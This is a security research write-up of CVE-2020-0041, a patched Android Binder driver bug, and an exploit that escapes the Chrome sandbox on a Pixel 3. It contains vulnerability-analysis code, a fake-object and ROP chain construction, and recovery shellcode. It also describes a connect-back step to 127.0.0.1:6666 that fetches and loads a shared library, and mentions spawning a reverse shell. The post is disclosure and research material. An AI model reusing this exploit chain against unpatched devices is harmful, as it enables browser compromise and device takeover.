Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox

Description of CVE-2020-0041 we reported to Google in December 2019, and the exploit for escaping the Google Chrome sandbox we wrote using this bug.

A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041.

In this post and the next we will describe the bug and the two exploits we wrote: a Chrome sandbox escape exploit that uses CVE-2020-0041 to compromise the Chrome browser process from within a compromised renderer, and a privilege escalation exploit that uses the same bug to compromise the kernel and escalate from a regular untrusted_app to root.

Root cause

The bug along with some prerequisites on Binder internals were already described by Jean-Baptiste Cayrou from Synacktiv in this post right after the Android Security Bulletin was made public. Since we find the explanation and accompanying graphics in that post very clear, we will limit ourselves to the necessary code details in this post and refer interested readers to it for further information.

The vulnerability was caused by a logic error when computing the number of valid offsets that have already been validated by the driver.

In particular, when the binder driver is processing a transaction it walks through a number of offsets and validates and translates binder objects at each such offset.

Objects of type BINDER_TYPE_PTR and BINDER_TYPE_FDA can have a parent object, which must be one of the already validated objects. To verify this, the driver uses the following code:

 

    case BINDER_TYPE_FDA: {
      struct binder_object ptr_object;
      binder_size_t parent_offset;
      struct binder_fd_array_object *fda =
        to_binder_fd_array_object(hdr);
[1]     size_t num_valid = (buffer_offset - off_start_offset) *
            sizeof(binder_size_t);
      struct binder_buffer_object *parent =
        binder_validate_ptr(target_proc, t->buffer,
                &ptr_object, fda->parent,
                off_start_offset,
                &parent_offset,
                num_valid);
      /* ... */

    } break;
    case BINDER_TYPE_PTR: {
      struct binder_buffer_object *bp =
        to_binder_buffer_object(hdr);
      size_t buf_left = sg_buf_end_offset - sg_buf_offset;
      size_t num_valid;

            /* ... */
[2]     if (binder_alloc_copy_user_to_buffer(
            &target_proc->alloc,
            t->buffer,
            sg_buf_offset,
            (const void __user *)
              (uintptr_t)bp->buffer,
            bp->length)) {
        binder_user_error("%d:%d got transaction with invalid offsets ptr\n",
              proc->pid, thread->pid);
        return_error_param = -EFAULT;
        return_error = BR_FAILED_REPLY;
        return_error_line = __LINE__;
        goto err_copy_data_failed;
      }

      /* Fixup buffer pointer to target proc address space */
      bp->buffer = (uintptr_t)
        t->buffer->user_data + sg_buf_offset;
      sg_buf_offset += ALIGN(bp->length, sizeof(u64));

[3]     num_valid = (buffer_offset - off_start_offset) *
          sizeof(binder_size_t);

      ret = binder_fixup_parent(t, thread, bp,
              off_start_offset,
              num_valid,
              last_fixup_obj_off,
              last_fixup_min_off);

The num_valid computations at [1] and [3] are incorrect, as the multiplication by sizeof(binder_size_t) should be a division instead. As a result of this error, an out-of-bounds offset can be provided as the parent of a PTR or FDA object.

Interestingly this error was only made during the sending path of a transaction, while the same value is correctly computed in the cleanup code.

Causing transaction corruption

Even though an out-of-bounds object offset seems immediately interesting, parent objects are still validated by the binder_validate_ptr and/or binder_validate_fixup functions before they can be used. Therefore, it is not possible to directly provide a completely arbitrary object.

Instead, we make use of the fact that the offset array is followed by so-called extra buffers or sg_buf in the transaction buffer, and that these buffers are copied into when a BINDER_TYPE_PTR is encountered ([2] in the code snippet above).

Based on this, if we use an out-of-bounds offset BEFORE we have copied the corresponding sg_buf data in, the data will be uninitialized and taken from a previously executed transaction. However, if the out-of-bounds offset is used AFTER the copy of the corresponding sg_buf, the offset will be taken from the newly copied data.

This is exactly the same approach identified by Synacktiv, and you can find a very graphical description in their blog post and slides.

Our exploit then performs the following steps to trigger this situation:

  1. A fake BINDER_TYPE_PTR object is added to the transaction at a certain offset fake_offset.
  2. A legitimate offset BINDER_TYPE_PTR object is added at legit_offset.
  3. A BINDER_TYPE_PTR object is added, with its parent set to an out-of-bounds offset. We pre-initialize the out-of-bounds offset to the legit_offset value by sending an initial transaction.

    The driver now has a validated object with an out-of-bounds parent offset, which also means the out-of-bounds parent offset becomes implicitly trusted.
  4. A second BINDER_TYPE_PTR object is added with the same out-of-bounds parent offset. However, this time we also add a buffer into this object. The copy at [2] will then set the out-of-bounds offset to fake_offset.

    Since the out-of-bounds offset is implicitly trusted after processing the object in step 3, the driver now trusts the fake BINDER_TYPE_PTR.

At this stage, the driver attempts to fixup the parent buffer with a pointer to the sg_buf data that has been copied in. This is done by binder_fixup_parent:

 

  parent = binder_validate_ptr(target_proc, b, &object, bp->parent,
             off_start_offset, &parent_offset,
             num_valid);
  if (!parent) {
    binder_user_error("%d:%d got transaction with invalid parent offset or type\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }

  if (!binder_validate_fixup(target_proc, b, off_start_offset,
           parent_offset, bp->parent_offset,
           last_fixup_obj_off,
           last_fixup_min_off)) {
    binder_user_error("%d:%d got transaction with out-of-order buffer fixup\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }

  if (parent->length < sizeof(binder_uintptr_t) ||
      bp->parent_offset > parent->length - sizeof(binder_uintptr_t)) {
    /* No space for a pointer here! */
    binder_user_error("%d:%d got transaction with invalid parent offset\n",
          proc->pid, thread->pid);
    return -EINVAL;
  }
[1] buffer_offset = bp->parent_offset +
      (uintptr_t)parent->buffer - (uintptr_t)b->user_data;
[2] binder_alloc_copy_to_buffer(&target_proc->alloc, b, buffer_offset,
            &bp->buffer, sizeof(bp->buffer));

last_fixup_obj_off here refers to the object validated in step 3, and because it's been validated its parent offset is also implicitly trusted. Therefore the binder_validate_fixup call succeeds.

However, the contents at parent_offset have been modified while processing the latter BINDER_TYPE_PTR object, and now point to a fake object with completely controlled contents (parent in the snippet above).

We can thus provide an arbitrary buffer_offset at [1], which is then used to copy the address of the sg_buf at [2].

Note however that we require knowing the value of b->user_data in order for the copy to succeed. Even worse, in the code currently shipped with Pixel devices the following BUG_ON will trigger if it's incorrect, which will crash the kernel:

 
static void binder_alloc_do_buffer_copy(struct binder_alloc *alloc,
          bool to_buffer,
          struct binder_buffer *buffer,
          binder_size_t buffer_offset,
          void *ptr,
          size_t bytes)
{
  /* All copies must be 32-bit aligned and 32-bit size */
  BUG_ON(!check_buffer(alloc, buffer, buffer_offset, bytes));

b->user_data is the address of the binder buffer where the transaction is being copied into in the address space of the recipient.

This value is trivial to learn if we are able to send a transaction to our own process, which is possible but requires using some tricks (we'll discuss one of those tricks in the coming posts). Additionally, in the case of the Chrome browser as currently released, this mapping is at the same address in the renderer and the browser process. Similarly, regular Android apps inherit from zygote or zygote64 and share a significant portion of their mappings.

Note also that instead of a BINDER_TYPE_PTR object we could use a BINDER_TYPE_FDA object in the last step. In that case, the driver would process an arbitrary part of the transaction as file descriptors, send them to the recipient and replace the file descriptor number.

This can also be used to corrupt arbitrary dwords, such as a validated object offset. This would allow injecting fully arbitrary objects into the transaction if required.

Available primitives

Using our memory corruption primitive we can overwrite parts of already validated binder transactions. Since these values are supposed to be read-only to anyone but the kernel, the rest of the system trusts them. There are two stages at which these values are used that we could target for our attack:

  1. When the corrupted transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers.
  2. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the corrupted transaction buffer.

In this post we'll focus on what can be done when we target the userspace components, and in follow up posts we'll discuss targeting the kernel cleanup code.

The code responsible for unmarshalling data and objects from a binder transaction can be found in Parcel.cpp within libbinder. The following piece of code is executed when an object is read from a transaction:

 
status_t unflatten_binder(const sp<ProcessState>& proc,
    const Parcel& in, sp<IBinder>* out)
{
    const flat_binder_object* flat = in.readObject(false);

    if (flat) {
        switch (flat->hdr.type) {
            case BINDER_TYPE_BINDER:
                *out = reinterpret_cast<IBinder*>(flat->cookie);
                return finish_unflatten_binder(nullptr, *flat, in);
    ...

From there we learn that if we corrupt the cookie field of a BINDER_TYPE_BINDER object, we will end up controlling the sp<IBinder *> pointer.

In order to understand what can be reached from the Chrome sandbox, we can take a look at services that we can reach from either the service manager or handles we already have access too. For the former, we can take a look at the SELinux policy:

    allow isolated_app activity_service:service_manager find;
    allow isolated_app display_service:service_manager find;
    allow isolated_app webviewupdate_service:service_manager find;
    ...
    neverallow isolated_app {
    service_manager_type
        -activity_service
        -ashmem_device_service
        -display_service
        -webviewupdate_service
    }:service_manager find;

  

This means we can ask the service manager for handles to the Activity Manager, Display Service, WebView update service and Ashmem service. From what we could see, all these processes are 64-bits and we are in a 32-bit process. Therefore, it will be hard for us to even trigger the bug without hitting the BUG_ON check above unless we have an additional leak from these processes.

We thus turned to the binder handles already available to a regular Chrome renderer process. To identify them, we used the following piece of C code, which borrows utility functions from the AOSP service manager code:

/*
 * @bs must be a binder_state constructed from the already initialized binder fd in order 
 * to identify what interfaces are available to the renderer process.
 */
void check_available_interfaces(struct binder_state *bs) {
  char txn_data[0x1000];
  char reply_data[0x1000];
  struct binder_io msg;
  struct binder_io reply;

  /* Iterate for a maximum of 100 handles */
  for(int handle=1; handle <= 100; handle++) {
    bio_init(&msg, txn_data, sizeof(txn_data), 10);
    bio_init(&reply, reply_data, sizeof(reply_data), 10);

    /* Retrieve handle interface */
    int ret = binder_call(bs, &msg, &reply, handle, INTERFACE_TRANSACTION);

    /* Check against wanted interface */
    if (!ret) {
      size_t sz = 0;
      
      char string[1000] = {0};
      uint16_t *str16 = bio_get_string16(&reply, &sz);
      if (sz != 0 && sz < sizeof(string)-1) {
        /* Convert to regular string */
        for (uint32_t x=0 ; x < sz; x++)
            string[x] = (char)str16[x];

        __android_log_print(ANDROID_LOG_DEBUG, "PWN", "Interface for handle %d -> %s", handle, string);
      }
    }
  }
}

Injecting this code into the renderer process on an Android 10 system provides the following output:

    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 1 -> android.app.IActivityManager
    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 2 -> android.content.pm.IPackageManager
    10-25 17:03:14.392  9764  9793 D PWN     : Interface for handle 4 -> android.hardware.display.IDisplayManager
    10-25 17:03:14.393  9764  9793 D PWN     : Interface for handle 5 -> org.chromium.base.process_launcher.IParentProcess
    10-25 17:03:14.394  9764  9793 D PWN     : Interface for handle 6 -> android.ashmemd.IAshmemDeviceService
  

All these handles belong to 64-bit service processes, except for the IParentProcess which belongs to the Chrome browser. Luckily for us, this process is also running in 32-bit mode in current Chrome releases, and therefore we can target it. Taking a look at the interface definition is however somewhat depressing:

// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

package org.chromium.base.process_launcher;

interface IParentProcess {
    // Sends the child pid to the parent process. This will be called before any
    // third-party code is loaded, and will be a no-op after the first call.
    oneway void sendPid(int pid);

    // Tells the parent proces the child exited cleanly. Not oneway to ensure
    // the browser receives the message before child exits.
    void reportCleanExit();
}

None of these calls is very interesting for our purposes, since there are no objects being passed around. However, if we dig deeper into how Binder objects are implemented we can find a solution to our troubles in the BBinder class that all (or most?) objects extend from:

status_t BBinder::onTransact(
    uint32_t code, const Parcel& data, Parcel* reply, uint32_t /*flags*/)
{
    switch (code) {
        /* ... */
        case SHELL_COMMAND_TRANSACTION: {
            int in = data.readFileDescriptor();
            int out = data.readFileDescriptor();
            int err = data.readFileDescriptor();
            int argc = data.readInt32();
            Vector<String16> args;
            for (int i = 0; i < argc && data.dataAvail() > 0; i++) {
               args.add(data.readString16());
            }
            sp<IShellCallback> shellCallback = IShellCallback::asInterface(
                    data.readStrongBinder());
            sp<IResultReceiver> resultReceiver = IResultReceiver::asInterface(
                    data.readStrongBinder());

            // XXX can't add virtuals until binaries are updated.
            //return shellCommand(in, out, err, args, resultReceiver);
            (void)in;
            (void)out;
            (void)err;

            if (resultReceiver != nullptr) {
                resultReceiver->send(INVALID_OPERATION);
            }

            return NO_ERROR;
        }

        /* ... */
    }
}

Thus, in the above the IResultReceiver object would point to controlled data if we have overwritten its cookie field with the bug. In order to do so reliably, the exploit performs the following steps:

  1. Finds its own binder mapping and the open binder file descriptor. These are then used to figure out the maximum transaction size we can send to the broker.
  2. Compute user_address as binder_mapping + MAPPING_SIZE - transaction_size. This is the address at which the received transaction buffer will start, assuming that the retrieved maximum transaction size corresponds to free space at the end of the binder mapping of the browser process.
  3. Send a transaction to pre-initialize an out-of-bounds value that will be used as an offset when we trigger the bug.
  4. Send a SHELL_COMMAND_TRANSACTION while triggering the bug. This requires adding a few objects to the transaction in order to reach the readStrongBindercalls:
    • Three file descriptor objects
    • An argument count of zero (so no strings need to be added)
    • A null binder as IShellCallback
    • The IParentProcess handle, which the driver will convert into a binder object. It is critical to provide a handle owned by the browser process here, since otherwise the driver will translate it into a handle instead of an actual object.
    • A fake PTR object, not added to the transaction, which will be used after triggering the bug.
    • A legitimate PTR object. The preinitialized offset from step 3 should match the offset of this object within the transaction buffer.
    • A second PTR object whose parent field is out of bounds, and points to the pre-initialized offset added above. We use a NULL buffer here, so that no copy is performed but that the out-of-bounds parent is taken as valid.
    • An additional PTR with the same parent but this time with a buffer. This buffer will replace the out-of-bounds offset, making it now point to the fake PTR object instead of the validated one. Additionally, the parent fixup code will now write a pointer to an arbitrary offset from the buffer start, which we use to modify the binder field of the IParentProcess node.
    • A final PTR with a new buffer. The buffer will be copied and its address will be written to the cookie field by the parent fixup code. This means the buffer we just sent will now be interpreted as an IResultReceiver object by the receiving code.

Note how we added additional objects to the transaction that are not actually parsed by the BBinder class shown above. However, this is not a problem since the libbinder code simply ignores additional objects that may be added to the transaction, as long as the required objects are present in the expected order.

Thus, with this setup we end up with a Binder object pointing to controlled data inside the Binder mapping itself.

From fake object to shellcode execution

The fake object is casted to an IResultReceiver object, which ends up causing a significant amount of code to be executed. The first thing we need to ensure is that the code can acquire a strong reference on the object.

In particular, a RefBase object is used for reference counting. The address of this object is extracted from the first dword of our buffer. Next, a pointer is obtained from the RefBase instance and the reference counts incremented:

int __fastcall android::RefBase::incStrong(android::RefBase *this, const void *a2)
{

  result = *((_DWORD *)this + 1);               // [1]
  v3 = (unsigned int *)(result + 4);
  do
    v4 = __ldrex(v3);
  while ( __strex(v4 + 1, v3) );
  do
    v5 = __ldrex((unsigned int *)result);
  while ( __strex(v5 + 1, (unsigned int *)result) );
  if ( v5 == 0x10000000 )
  {
    do
      v6 = __ldrex((unsigned int *)result);
    while ( __strex(v6 - 0x10000000, (unsigned int *)result) );
    result = (*(int (__fastcall **)(_DWORD))(**(_DWORD **)(result + 8) + 8))(*(_DWORD *)(result + 8)); // [2]
  }
  return result;
}

The pointer dereferenced at [1] must point to a writable address, and its contents must not be the special value 0x10000000 to avoid the call at [2].

The first part is problematic since our fake object is inside a binder mapping, which is always read-only for userland. In our exploit we set this pointer to a temporary buffer in the data segment of the libc. We can do this because we are already assuming that the target process mappings are very similar to our own, thus we can simply take our own libc address.

Once we get past this incStrong call, the code flows until the following indirect call:

int __fastcall android::javaObjectForIBinder(int a1, android **myobj)
{

  if ( !*myobj )
    return 0;
  if ( (*(int (__fastcall **)(android *, int *))(*(_DWORD *)*myobj + 32))(*myobj, &dword_153848) )
    return *((_DWORD *)*myobj + 4);

The value of *myobj here matches that of our fake object, so we end up calling a function pointer from our fake object and passing the fake object address as a first parameter. Thus, with the following code we obtain code execution:

  /* 
   * We use the address of the __sF symbol as temporary storage. From the source code,
   * this symbol appears to be unused in the current bionic library. 
   */

  uint32_t utmp = (uint32_t)dlsym(handle, "__sF");
  DO_LOG("[*] Temporary storage: %x\n", utmp);

  ...

  DO_LOG("[*] fake_object_addr: %x\n", fake_object_addr);

  uint64_t offset_ref_base = 0xd0;
  fake_object[0] = fake_object_addr + offset_ref_base*sizeof(uint32_t) + 12; 

  ...

  /*
   * This is a fake RefBase class, with a pointer to a writable area in libc.
   * We need this because our object is located in the binder mapping and cannot
   * be written to from usermode. 
   * 
   * The RefBase code will try to increment a refcount before we get control, so
   * pointing it to an empty buffer is fine. The only thing we need to take care of 
   * is preventing it from being the special `initial value` of strong ref counts,
   * because in this case the code will also do a virtual functionc all through this 
   * fake object.
   */

  fake_object[offset_ref_base] = (offset_ref_base + 1)*sizeof(uint32_t); /* This is used as an offset from the base object*/
  fake_object[offset_ref_base+1] = 0xdeadbeef;                           /* Unused */
  fake_object[offset_ref_base+2] = (uint32_t)utmp;                       /* Writable address in libc */


  /* Here comes the PC control. We point it to a stack pivot, and r0
   * points to the beginning of our object (i.e to &fake_object[0]).
   */

  fake_object[offset_ref_base +11] = gadgets[STACK_PIVOT].address;

 

utmp here is the address of a buffer in libc that appears to be in used, and that's part of a writable mapping. Since the address of the libc on the renderer process and the browser process is identical, we can just resolve it on our own process. Similarly, we resolve all ROP gadgets on our own process.

Additionally, since the binder mapping address is also the same on both processes, we can use this to compute the address of our own data in the target process.

Since the fake object is also passed as the first parameter, we pivot the stack to R0 using an ldm r0!, {r2, r5, ip, sp, lr, pc} gadget and start a ROP chain from the beginning of the object. The final setup looks as follows:

However, the fact that the mapping is read-only makes it impossible to call any functions that use the stack. For that reason, our ROP chain performs the following steps:

  1. Use a gadget to save r7 into the utmp buffer. r7 contains a pointer to the stack when our ROP chain starts executing, so this allows us to set the stack back to a good value later on. We use the following gadget for this: str r7, [r0] ; mov r0, r4 ; add sp, #0xc ; pop {r4, r5, r6, r7, pc}.
  2. Use mmap to allocate RWX pages at a fixed address. We use the following code from the libc system call wrappers for that: svc 0 ; pop {r4-r7} ; cmn r0, #0x1000, bx lr.
  3. Use a few ROP gadgets to copy a first stage shellcode into RWX memory. In particular, we use str r1, [r0] ; mov r0, lr ; pop {r7, pc} to write r1 to the address pointed by r0 after popping these registers from the stack.
  4. Pivot the stack to the RWX memory, call cacheflush on the copied shellcode and jump to it. We use a pop {lr, pc} gadget to prepare the return address for cacheflush, and a pop {r0, r1, ip, sp, pc} gadget to pivot the stack and call into cacheflush.

As soon as cacheflush returns we get shellcode execution and a proper read/write stack. In order to reduce the ROP chain size, we use a small initial shellcode that uses memcpy to copy the next stage into RWX memory, then calls cacheflush once again and finally jumps to it.

Now that we have unrestricted shellcode execution, we can execute any action required by our exploit and then fix up the Chrome process so that the user can continue browsing happily.

Process continuation

In order to achieve process continuation, our main shellcode connects back to 127.0.0.1:6666 and retrieves a shared library. The shared library is stored as /data/data/<package_name>/test.so and loaded using __loader_dlopen.

The __loader_dlopen symbol is currently resolved heuristically by the code injected to the renderer. This is required because the default dlopen prevents loading libraries from non-standard paths, so we follow a similar approach to that of Frida.

After loading the shared object, the shellcode restores the browser process state.

In order to do so, we use one of the higher stack frames that restores most registers from the stack. In particular, we use the copies of the registers stored by art_quick_invoke_stub in libart.so:

.text:0042F7AA                 POP.W           {R4-R11,PC}
.text:0042F7AE ; ---------------------------------------------------------------------------
.text:0042F7AE
.text:0042F7AE loc_42F7AE                              ; CODE XREF: art_quick_invoke_stub+106↑j
.text:0042F7AE                 BLX             __stack_chk_fail
.text:0042F7AE ; End of function art_quick_invoke_stub
.text:0042F7AE

The renderer code parses the ArtMethod::Invoke assembly code and finds the return address for the art_quick_invoke_stub call. Then the shellcode looks through the stack to find the corresponding stack frame and restore all registers before returning.

However, just returning there results in the Art VM crashing at different points later on.

In order to fix this, we analyzed the crashing locations. The crashes we observed were related to garbage collection and occurred within this code:

void Thread::HandleScopeVisitRoots(RootVisitor* visitor, pid_t thread_id) {
  BufferedRootVisitor<kDefaultBufferedRootCount> buffered_visitor(
      visitor, RootInfo(kRootNativeStack, thread_id));
  for (BaseHandleScope* cur = tlsPtr_.top_handle_scope; cur; cur = cur->GetLink()) {
    cur->VisitRoots(buffered_visitor);
  }
}

Or in assembly:

PUSH.W          {R4-R11,LR}
SUB.W           SP, SP, #0x418
SUB             SP, SP, #4
MOV             R5, R1
LDR             R1, =(__stack_chk_guard_ptr - 0x3AE4A6)
ADD             R1, PC  ; __stack_chk_guard_ptr
LDR.W           R10, [R1] ; __stack_chk_guard
LDR.W           R1, [R10]
LDR             R3, =(_ZTVN3art8RootInfoE - 0x3AE4B8) ; `vtable for'art::RootInfo
STR.W           R1, [SP,#0x440+var_28]
MOVS            R1, #4
ADD             R3, PC  ; `vtable for'art::RootInfo
STR             R1, [SP,#0x440+var_434]
ADD.W           R1, R3, #8
STR             R2, [SP,#0x440+var_430]
MOVS            R2, #0
STR.W           R2, [SP,#0x440+var_2C]
STRD.W          R5, R1, [SP,#0x440+var_43C]
LDR.W           R7, [R0,#0xDC]           ; [1]
CMP             R7, #0
BEQ             loc_3AE582

At [1] we see offset 0xDC from the Thread object is checked against null. At the point where we are returning, r6 points to the current Thread * object.

Therefore, our shellcode gets the current Thread * value from the restored registers and clears this field before continuing.

The final recovery part of the shellcode looks as follows:

return:
# Get and fix sp up. Point to stack frame containing r4-r10 and pc.
  ldr r3, smem
  ldr sp, [r3]
  ldr r3, retoff

search:
  # Load 'lr' if there 
  ldr r0, [sp, #0x20] 
  cmp r0, r3
  addne sp, sp, #4
  bne search

done: 
# Pop all registers
  pop {r4-r11, lr}

# Clear thread top_handle_scope
  mov r0, #0
  str r0, [r6, #0xdc]

  bx lr

With this, the browser process continues executing cleanly after our shared object has been loaded. The shared object can thus perform any additional actions such as launching a background thread or forking and launching a reverse shell.

Demonstration video

The following video shows the process of compromising the Chrome browser on a vulnerable Pixel 3 with the February 2020 patch level. On the top-left you see a root shell on the target device, which we use to inject our exploit into a renderer process. On the bottom-left you see the output of our exploit through logcat.

On the right, you see a display of the target device, where we show the target setup and start Chrome. After having started Chrome, we inject the shellcode using the root shell and almost immediately receive a reverse shell on the top-right part of the screen.

As you can see, the shell is running in the context of the browser process, and has therefore escaped the sandbox.

Code and next steps

You can find the code for the exploit described in this post in the Blue Frost Security GitHub. We provide the code as a set of patches for Chromium 78.0.3904.62 for demonstration purposes only.

In the next post, we will discuss how to attack the processing performed by the kernel in order to achieve a privilege escalation to root using this very same bug.